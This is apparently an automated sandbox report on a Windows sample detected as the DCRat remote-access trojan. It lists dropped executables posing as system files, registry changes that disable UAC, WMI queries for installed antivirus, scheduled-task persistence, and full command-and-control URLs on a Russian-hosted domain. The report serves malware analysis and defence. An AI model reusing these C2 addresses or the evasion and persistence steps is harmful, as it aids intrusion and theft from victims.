Source: C:\Windows\System32\wscript.exe Process created: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe "C:\Users\All Users\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe"
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Queries volume information: C:\Users\user\Desktop\4KjLUaW30K.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Queries volume information: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe Queries volume information: C:\Program Files (x86)\Mozilla Maintenance Service\logs\audiodg.exe VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Queries volume information: C:\Program Files (x86)\Windows Defender\dllhost.exe VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Windows Defender\dllhost.exe Queries volume information: C:\Program Files (x86)\Windows Defender\dllhost.exe VolumeInformation
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Queries volume information: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe VolumeInformation
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Queries volume information: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe VolumeInformation
Source: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe Queries volume information: C:\Users\Default\OneDrive\mnUYCZffXdEgQlZPiczLektp.exe VolumeInformation
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Queries volume information: C:\Users\Public\Downloads\ShellExperienceHost.exe VolumeInformation
Source: C:\Users\Public\Downloads\ShellExperienceHost.exe Queries volume information: C:\Users\Public\Downloads\ShellExperienceHost.exe VolumeInformation
Source: C:\Recovery\System.exe Queries volume information: C:\Recovery\System.exe VolumeInformation
Source: C:\Recovery\System.exe Queries volume information: C:\Recovery\System.exe VolumeInformation
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe Queries volume information: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe VolumeInformation
Source: C:\Recovery\System.exe Queries volume information: C:\Recovery\System.exe VolumeInformation
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Disable UAC(promptonsecuredesktop)
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Registry value created: PromptOnSecureDesktop 0 Jump to behavior
Disables UAC (registry)
Source: C:\Users\user\Desktop\4KjLUaW30K.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA Jump to behavior
AV process strings found (often used to terminate AV products)
Source: mnUYCZffXdEgQlZPiczLektp.exe, 0000001C.00000002.2146148612.000000001B550000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\ProgramData\USOShared\Logs\mnUYCZffXdEgQlZPiczLektp.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information
barindex
Yara detected DCRat
Source: Yara match File source: 0000001E.00000002.2180403115.0000000002BAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.2187145311.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2074993070.0000000002E38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.2234188359.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.2187145311.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2159383737.0000000003231000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2187202631.0000000002FCD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.2180403115.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2172899315.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2155021661.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2159383737.000000000326D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2177147830.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.2186040475.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2179948488.0000000002781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2187202631.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2119361653.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.2256735845.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2074993070.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.2185482678.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2086148884.0000000012A2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 4KjLUaW30K.exe PID: 4564, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: audiodg.exe PID: 1488, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: audiodg.exe PID: 6768, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: dllhost.exe PID: 7216, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: dllhost.exe PID: 7264, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mnUYCZffXdEgQlZPiczLektp.exe PID: 7304, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mnUYCZffXdEgQlZPiczLektp.exe PID: 7316, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mnUYCZffXdEgQlZPiczLektp.exe PID: 7388, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ShellExperienceHost.exe PID: 7484, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ShellExperienceHost.exe PID: 7560, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: System.exe PID: 7616, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: System.exe PID: 7640, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mnUYCZffXdEgQlZPiczLektp.exe PID: 8092, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: System.exe PID: 8152, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected DCRat
Source: Yara match File source: 0000001E.00000002.2180403115.0000000002BAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.2187145311.0000000002EAB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2074993070.0000000002E38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.2234188359.00000000024C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.2187145311.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2159383737.0000000003231000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2187202631.0000000002FCD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.2180403115.0000000002B91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2172899315.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.2155021661.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2159383737.000000000326D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.2177147830.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.2186040475.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.2179948488.0000000002781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.2187202631.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.2119361653.0000000002571000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.2256735845.0000000002E31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2074993070.0000000002A21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.2185482678.0000000002C71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2086148884.0000000012A2F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 4KjLUaW30K.exe PID: 4564, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: audiodg.exe PID: 1488, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: audiodg.exe PID: 6768, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: dllhost.exe PID: 7216, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: dllhost.exe PID: 7264, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mnUYCZffXdEgQlZPiczLektp.exe PID: 7304, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mnUYCZffXdEgQlZPiczLektp.exe PID: 7316, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mnUYCZffXdEgQlZPiczLektp.exe PID: 7388, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ShellExperienceHost.exe PID: 7484, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: ShellExperienceHost.exe PID: 7560, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: System.exe PID: 7616, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: System.exe PID: 7640, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mnUYCZffXdEgQlZPiczLektp.exe PID: 8092, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: System.exe PID: 8152, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1561676 Sample: 4KjLUaW30K.exe Startdate: 24/11/2024 Architecture: WINDOWS Score: 100 53 a1043195.xsph.ru 2->53 57 Multi AV Scanner detection for domain / URL 2->57 59 Suricata IDS alerts for network traffic 2->59 61 Found malware configuration 2->61 63 19 other signatures 2->63 9 4KjLUaW30K.exe 10 25 2->9         started        13 ShellExperienceHost.exe 2->13         started        15 System.exe 2->15         started        17 10 other processes 2->17 signatures3 process4 file5 45 C:\Users\Public\...\ShellExperienceHost.exe, PE32 9->45 dropped 47 C:\Users\...\mnUYCZffXdEgQlZPiczLektp.exe, PE32 9->47 dropped 49 C:\Recovery\System.exe, PE32 9->49 dropped 51 11 other malicious files 9->51 dropped 69 Creates an undocumented autostart registry key 9->69 71 Creates multiple autostart registry keys 9->71 73 Uses schtasks.exe or at.exe to add and modify task schedules 9->73 81 3 other signatures 9->81 19 mnUYCZffXdEgQlZPiczLektp.exe 9->19         started        24 schtasks.exe 9->24         started        26 schtasks.exe 9->26         started        28 19 other processes 9->28 75 Antivirus detection for dropped file 13->75 77 Multi AV Scanner detection for dropped file 13->77 79 Machine Learning detection for dropped file 13->79 signatures6 process7 dnsIp8 55 a1043195.xsph.ru 141.8.192.93, 49708, 49732, 49759 SPRINTHOSTRU Russian Federation 19->55 37 ae22e728c3f2323357...64b4445f7960812.exe, PE32 19->37 dropped 39 ae22e728c3f2323357...exe:Zone.Identifier, ASCII 19->39 dropped 41 70189604-2a9a-4ba1-809b-491977885217.vbs, ASCII 19->41 dropped 43 28bf72c6-5a6e-449b-a0d6-76cd4ab5c11d.vbs, ASCII 19->43 dropped 65 Multi AV Scanner detection for dropped file 19->65 67 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 19->67 30 wscript.exe 19->30         started        33 wscript.exe 19->33         started        file9 signatures10 process11 signatures12 83 Windows Scripting host queries suspicious COM object (likely to drop second stage) 30->83 35 mnUYCZffXdEgQlZPiczLektp.exe 30->35         started        process13
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
141.8.192.93
 a1043195.xsph.ru Russian Federation
35278 SPRINTHOSTRU true

Contacted Domains

Name IP Active
a1043195.xsph.ru 141.8.192.93 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://a1043195.xsph.ru/e561840a.php?cl=MU3vrX2xf8nUihMHACnKj36jO&RpUrFFQZYG69rKpAFv3A0wkZY8y=NTXUg0GMdy3iEJI&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&cl=MU3vrX2xf8nUihMHACnKj36jO&RpUrFFQZYG69rKpAFv3A0wkZY8y=NTXUg0GMdy3iEJI true
  • Avira URL Cloud: malware
 unknown
http://a1043195.xsph.ru/e561840a.php?5KSwfM1XMNin8a1tisW=mdlGy9qsXR&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&5KSwfM1XMNin8a1tisW=mdlGy9qsXR true
  • Avira URL Cloud: malware
 unknown
http://a1043195.xsph.ru/e561840a.php?OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&OA4wYep3at3BJWRE=LjRHrGY1NakWTvTw0sePnjeqs true
  • Avira URL Cloud: malware
 unknown
http://a1043195.xsph.ru/e561840a.php?xVG80hM=hn2&8PfMQbdasrWBeFMD7qf8K3A4XF9O9rr=CHDgx4&gqVdG=FeuUIF0I3yEOlyKbPbB9N8XBqQCi8Sy&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&xVG80hM=hn2&8PfMQbdasrWBeFMD7qf8K3A4XF9O9rr=CHDgx4&gqVdG=FeuUIF0I3yEOlyKbPbB9N8XBqQCi8Sy true
  • Avira URL Cloud: malware
 unknown
http://a1043195.xsph.ru/e561840a.php?6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R6IApKsc&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&6AlqDLuQGYbBId=gCYL9zkUdBuC08JQaV7uaRdflujR&PwmCbXGZ2=jWpIoTJ3R6IApKsc true
  • Avira URL Cloud: malware
 unknown
http://a1043195.xsph.ru/e561840a.php?TuL2hSCP9SfVYBiGie5CRyTCq=bSB9NQ&hPoKZhDXzG8XL4Xlk2=O6efaILX0uNAFOw1v45I61pbrV&fQEqbHZBmDuOCOKMmmG2I=Dlqot1XRCxEepH&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&TuL2hSCP9SfVYBiGie5CRyTCq=bSB9NQ&hPoKZhDXzG8XL4Xlk2=O6efaILX0uNAFOw1v45I61pbrV&fQEqbHZBmDuOCOKMmmG2I=Dlqot1XRCxEepH true
  • Avira URL Cloud: malware
 unknown
http://a1043195.xsph.ru/e561840a.php?pjrl5w7K39YkW8ohPsI7w0KcXus=bWRfDt01CulxteygFk08RJEfi7EyY&NLECtgr2h=IxeeHUNRCoWx3tnSRw7F&BcxgatrvRyMCOzeojXNtw=u2aRUYaP45b7HUr7rlgfuzJvp&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&pjrl5w7K39YkW8ohPsI7w0KcXus=bWRfDt01CulxteygFk08RJEfi7EyY&NLECtgr2h=IxeeHUNRCoWx3tnSRw7F&BcxgatrvRyMCOzeojXNtw=u2aRUYaP45b7HUr7rlgfuzJvp true
  • Avira URL Cloud: malware
 unknown
http://a1043195.xsph.ru/e561840a.php?I2G4s=IMSEV2S071HqCvJ1J7jvi0Ev&glD0UhPCN5IkMoV0wZ=KC1L8RsJV7M&IhhyROAmT1=y0AR6SN4wavlfoaFjmY4F&060931c2fd73bb7eab1002c5e7ff62ae=c39cf4658ac2210f688ec15b4a8e711c&715f56a8f995d061ee256bc7f2c70953=wM3IjNhhzNxcTO4kjNlZzNkJDOhVmN5kjYjljYxgDOhRWMjVDZ1cDM&I2G4s=IMSEV2S071HqCvJ1J7jvi0Ev&glD0UhPCN5IkMoV0wZ=KC1L8RsJV7M&IhhyROAmT1=y0AR6SN4wavlfoaFjmY4F true
  • Avira URL Cloud: malware
 unknown